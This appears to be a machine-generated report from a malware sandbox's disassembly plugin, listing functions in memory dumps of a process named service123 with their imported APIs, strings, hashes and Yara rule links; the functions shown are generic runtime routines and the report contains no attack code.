Instruction Fuzzy Hash: 33416AB2A047099BCB00AF69D48569EFBF4FF95714F40882CE9C5ABB14D73094498F93

Function 6C2F3659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2F3567
fputc.MSVCRT ref: 6C2F35D7
memset.MSVCRT ref: 6C2F3692

Strings

0, xrefs: 6C2F3687
o, xrefs: 6C2F369A

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: 517974dfa7c49f6bf639ef5f5d1e2cee5d74eb9064e60957475ebe8b04129885
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: 05314C71A4831D8BDB01DF69C0907AAFBF1BF88314F148659E9A5ABB41D734E806CB52

Function 002D2F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 002D2E97
fputc.MSVCRT ref: 002D2F07
memset.MSVCRT ref: 002D2FC2

Strings

0, xrefs: 002D2FB7
o, xrefs: 002D2FCA

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: db0c79bebb9fb85fca4eac7bf2a4c6370ec9f861d0c2e7fc940b97d66e2f28cc
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: 82315B71924316CBCB11CF68C0947AABBF1BF68310F15852AD995AB352D738ED18CB50

Function 6C2E9490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C2E94C2
strlen.MSVCRT ref: 6C2E9616

Strings

_GLOBAL_, xrefs: 6C2E94B7

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: 4f3573bb63605d765757cb54489c4af908124c4975b2fa3c5d8722e28dca1cc9
Instruction ID: 277e0bceb9d3aa6738f4500c5d15d20edaca2458159a7e99d6f9c9d14e476fe6
Opcode Fuzzy Hash: 4f3573bb63605d765757cb54489c4af908124c4975b2fa3c5d8722e28dca1cc9
Instruction Fuzzy Hash: F2F17FB090521D8FEB10DF29C8903DDBBF1AF4A308F8441EAD858BB645D7759A99CF81

Function 6C35D860 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6C37F670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C35D7DE), ref: 6C37F70D
Part of subcall function 6C37F670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C35D7DE), ref: 6C37F738

memcpy.MSVCRT ref: 6C35DA65

Part of subcall function 6C3822E0: memcpy.MSVCRT(?,-00000001,?,6C30724E,?,?,?,?,?,?,?,?,?,?,?,6C308BD5), ref: 6C38231C

Strings

Unknown error, xrefs: 6C35D8B8
iostream error, xrefs: 6C35DAB8
basic_string::append, xrefs: 6C35DB62, 6C35DB6E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: c47dcc9eeee8c7e9707215b8355d5751b7d0e1e23f061790440cde847de9726c
Instruction ID: 044bd2e7931f4d60257bbe6c832c1cf47e20290f6b9a7df58c83eaecd90bd5b0
Opcode Fuzzy Hash: c47dcc9eeee8c7e9707215b8355d5751b7d0e1e23f061790440cde847de9726c
Instruction Fuzzy Hash: DAA125B5D04318CBCB10DFA8C580A9EBBF1BF48314F61892ED899ABB50D7319855CF92

Function 6C34BD10 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C34BDEF
memcpy.MSVCRT ref: 6C34BE49
memcpy.MSVCRT ref: 6C34BED7

Part of subcall function 6C34C2B0: memcpy.MSVCRT ref: 6C34C33C

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C34BF63
basic_string::replace, xrefs: 6C34BF44, 6C34BF57

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: aabcc7a4bbdf59f7372f9a330129853406ba8b6d930e03fdbe9349326b79d496
Instruction ID: 5751ab5dc4d6ed0f39abecd69f4dfb796acddc84674b94564da19414082f5ff5
Opcode Fuzzy Hash: aabcc7a4bbdf59f7372f9a330129853406ba8b6d930e03fdbe9349326b79d496
Instruction Fuzzy Hash: 1D815571A05A199FCB00DF28C48099EBBF5FF88308F10C96AE8989B710E731D955CF92

Function 6C354DB0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C354E80
memcpy.MSVCRT ref: 6C354ED4
memcpy.MSVCRT ref: 6C354F68

Part of subcall function 6C355340: memcpy.MSVCRT ref: 6C3553D0

Strings

basic_string::replace, xrefs: 6C354FD9, 6C354FEC
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C354FF8

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 7d88c30f6c8a6d24cfee978d39ed37b8c0430b6dca757597790a65ad63a4b503
Instruction ID: 538fd0ef072dcdac2b5cb257e5147212cabab63a7d66fde05f2db2e215b37c6c
Opcode Fuzzy Hash: 7d88c30f6c8a6d24cfee978d39ed37b8c0430b6dca757597790a65ad63a4b503
Instruction Fuzzy Hash: E6814775B082059FCB04DF6CC48099EBBF5AF88258F51892EE898D7714D731E964CF92

Function 6C35D5C0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C37F670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C35D7DE), ref: 6C37F70D
Part of subcall function 6C37F670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C35D7DE), ref: 6C37F738

strlen.MSVCRT ref: 6C35D695
memcpy.MSVCRT ref: 6C35D76E

Strings

Unknown error, xrefs: 6C35D60E
iostream error, xrefs: 6C35D7C2

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: ad24048c061bc112485942e229264155fe884a763c2a9e484095fca6bd5b7359
Instruction ID: 1d5e11e3a98b70e389ce80ac0e4e260f449ae20635a041051df89ef4f51bbaa3
Opcode Fuzzy Hash: ad24048c061bc112485942e229264155fe884a763c2a9e484095fca6bd5b7359
Instruction Fuzzy Hash: AA61E4B49043088FCB04DFA8C584A9EBBF1BF88314F50892ED8999B754E7759849CF92

Function 6C2EF840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2EF85F
ReleaseSemaphore.KERNEL32 ref: 6C2EF8E3

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: 8aa0636f76ba698fff1fbf165b3bf3234eb03313315a479622555baf93dce7b7
Instruction ID: e4cfb762ff7e556fc8d96cab65dd02d93f5f37c0d7498743fb6cc3e7971f9dbb
Opcode Fuzzy Hash: 8aa0636f76ba698fff1fbf165b3bf3234eb03313315a479622555baf93dce7b7
Instruction Fuzzy Hash: F0319A70B09306DFEB00EF29D6487477BF4BB4A329F41865CE898AB280C335D905CB92

Function 6C2EFCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2EFCEC
ReleaseSemaphore.KERNEL32 ref: 6C2EFD7C
CreateSemaphoreW.KERNEL32 ref: 6C2EFDC7
WaitForSingleObject.KERNEL32 ref: 6C2EFE10

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: 08e555beb6d57700abb100ada86b9ede7ea47ffa35ac6ff095baebb3f0b1ad5c
Instruction ID: 370d957f333e29148ee57a74c6fa8f0d8b2660bffe5ac1ad8145a397dded98eb
Opcode Fuzzy Hash: 08e555beb6d57700abb100ada86b9ede7ea47ffa35ac6ff095baebb3f0b1ad5c
Instruction Fuzzy Hash: ED317870B4A3068FDB00EF29D2487477BF4BB4A318F55862CE8589B285C335D805CFA2

Function 6C3A82D0 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C3A82E5
strlen.MSVCRT ref: 6C3A8333
memcpy.MSVCRT ref: 6C3A8350
setlocale.MSVCRT ref: 6C3A8364
setlocale.MSVCRT ref: 6C3A839A

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 392e0c0a0087e261060568a5cd43dae258db378c26ba78c8b519c53f7bc8e961
Instruction ID: c7f1a94917343b62482aa571eedebdabec87d72845e215e36faa66ecd6e00b33
Opcode Fuzzy Hash: 392e0c0a0087e261060568a5cd43dae258db378c26ba78c8b519c53f7bc8e961
Instruction Fuzzy Hash: 4721EFB4A083549FD340EF68D48065EFBE0EF88658F44896EE9D887701E734C9568F82

Function 6C2F9530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C2F9549
_unlock.MSVCRT ref: 6C2F9571
calloc.MSVCRT ref: 6C2F95BF

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: ee87ef164ba6f1c60bf25b1074f6aa38ef1e4fb0a1b52e8f42ed8cb7acc5c7f6
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: 80116A705442198FD741AF28C480A86FBE0AF89344F1585A9D8A8CF745EB30D856CB92

Function 6C2F0290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2F02BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2F04DE), ref: 6C2F02CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2F04DE), ref: 6C2F0300

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: 553b53733383e713884b172b2697becbd6016bca2653dd7b9bbed06a70c7d2c7
Instruction ID: 9b5bfef95dcda55dcb9a6544a3f54d84ee508805c9bd8e57bdc5326215d391b3
Opcode Fuzzy Hash: 553b53733383e713884b172b2697becbd6016bca2653dd7b9bbed06a70c7d2c7
Instruction Fuzzy Hash: FFF030706893499BD700BF68CA0831ABEB0BB42318F404B1CE87587A91E7354055CF53

Function 6C2F52CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 6C2F52F7
@, xrefs: 6C2F4D17

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 6717a682b634692355540e5553c80ed15b92d6d466212c875c59ea571d907174
Instruction ID: 1fbe3c2e56628c62050627f18c9c650a3e023b805c3afdf4deaef56055508921
Opcode Fuzzy Hash: 6717a682b634692355540e5553c80ed15b92d6d466212c875c59ea571d907174
Instruction Fuzzy Hash: CEA1AE7168835E8BD721CE28C19079AF7E1BB85709F15862DECE887741D7B4D50BCB82

Function 002D4BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 002D4647
(null), xrefs: 002D4C27

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: bdd7de8b58c826f845951f92fc132c3d7c60a2ae82503edc5c7b44f6c72ed133
Instruction ID: 8d097ec65aeb2ad4027c0cbbac4136106a76d4d6589b4c64caed31a25dc89230
Opcode Fuzzy Hash: bdd7de8b58c826f845951f92fc132c3d7c60a2ae82503edc5c7b44f6c72ed133
Instruction Fuzzy Hash: 03A19E316283928BD731AF24D0807AAB7E1BF85318F148A1FE8D897342D775DD56DB82

Function 002D1B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 002D1C20
Unknown pseudo relocation protocol version %d., xrefs: 002D1DF3
Unknown pseudo relocation bit size %d., xrefs: 002D1C6D

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 3497191b4cf020d3c9ad1995f9b999e5aa3105d5ffb6ab72215ea1f7b0a0dcce
Instruction ID: c91ab796a071ed8bc1a3a3d908b95f0f97e7731de3ad2ed657f294eb2d489201
Opcode Fuzzy Hash: 3497191b4cf020d3c9ad1995f9b999e5aa3105d5ffb6ab72215ea1f7b0a0dcce
Instruction Fuzzy Hash: E6817E71A24606ABCB10DF68D880BAEB7F5FF84344F14856BD894A7754D330EC358B92

Function 6C2EA850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

Unknown pseudo relocation protocol version %d., xrefs: 6C2EAB43
Unknown pseudo relocation bit size %d., xrefs: 6C2EA9BD
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C2EA970

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 79b145fece555029562f50bca837de1bdea27026f876acc70fe147775392d756
Instruction ID: 63f990c9b157ce54327a5c63b9d1bb903c922019aa4760ba5124267b75a0c755
Opcode Fuzzy Hash: 79b145fece555029562f50bca837de1bdea27026f876acc70fe147775392d756
Instruction Fuzzy Hash: 4D718136A0521ACBCB00DF69C98078EBBF5FF49318F568529ED54BBB04D730E9458B92

Function 6C2F9128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C2F9142
strchr.MSVCRT ref: 6C2F9152
atoi.MSVCRT ref: 6C2F9163

Strings

., xrefs: 6C2F9147

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction ID: 86075ce6b9e7a608b0d9fc13f0575e99c04b8d87b2f2f2d3ce5a9121dd8586e0
Opcode Fuzzy Hash: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction Fuzzy Hash: 0DE08CB09447098EE7047F38C40839AF6E1BB80308F85886CD89887700E739C46A8B42

Function 002D80D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 002D80F2
strchr.MSVCRT ref: 002D8102
atoi.MSVCRT ref: 002D8113

Strings

., xrefs: 002D80F7

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
